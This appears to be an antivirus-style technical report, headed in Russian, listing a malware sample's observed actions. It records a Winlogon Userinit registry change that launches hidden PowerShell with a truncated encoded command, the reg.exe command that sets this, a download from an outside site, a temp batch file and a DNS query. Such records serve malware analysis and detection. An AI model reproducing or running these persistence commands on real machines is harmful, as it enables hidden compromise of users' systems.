Техническая информация
- [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Userinit' = '<SYSTEM32>\userinit.exe,powershell.exe -windowstyle hidden -enc RgBvAHIAIAAoADsAIAAxACAALQBlAHEAIAAxADsAIAApAHsACgAgAC...
- https://selfconquering.com/wp-content/uploads/2020/07/the-tate-brothers.jpg as c:\users\public\tates.jpg
- %TEMP%\cub4s99p.bat
- DNS ASK se####nquering.com
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\CUb4s99p.bat" "
- '<SYSTEM32>\reg.exe' add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "<SYSTEM32>\userinit.exe,powershell.exe -windowstyle hidden -enc RgBvAHIAIAAoADsAIAAxACAALQBlAHEAIAAx...